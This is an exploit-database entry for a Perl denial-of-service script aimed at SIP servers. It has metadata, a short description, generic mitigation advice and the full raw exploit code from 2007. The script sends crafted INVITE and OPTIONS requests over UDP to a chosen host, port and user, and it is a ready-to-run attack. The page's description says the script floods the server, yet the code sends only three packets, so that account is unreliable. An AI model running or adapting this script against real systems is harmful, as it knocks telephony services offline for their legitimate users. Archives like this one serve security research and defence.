Perl SIP INVITE and OPTIONS Requests Denial of Service

vendor:

Unknown

by:

Unknown

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Perl SIP INVITE and OPTIONS Requests Denial of Service

This Perl script sends INVITE and OPTIONS requests to a SIP server, causing a Denial of Service (DoS) by flooding the server with these requests. The script uses the IO::Socket::INET module to create a UDP socket and send the requests. The requests are sent with specific headers and parameters to target a specific user on the SIP server. This vulnerability allows an attacker to disrupt the SIP server and potentially render it unavailable for legitimate users.

Mitigation:

To mitigate this vulnerability, it is recommended to implement rate limiting or traffic filtering mechanisms on the SIP server to prevent excessive requests from a single source. Additionally, keeping the server software up to date with security patches can help protect against known vulnerabilities.

Source

Exploit-DB raw data:

#!/usr/bin/perl
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=00\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";;

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=01\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

 

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=02\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

# milw0rm.com [2007-08-21]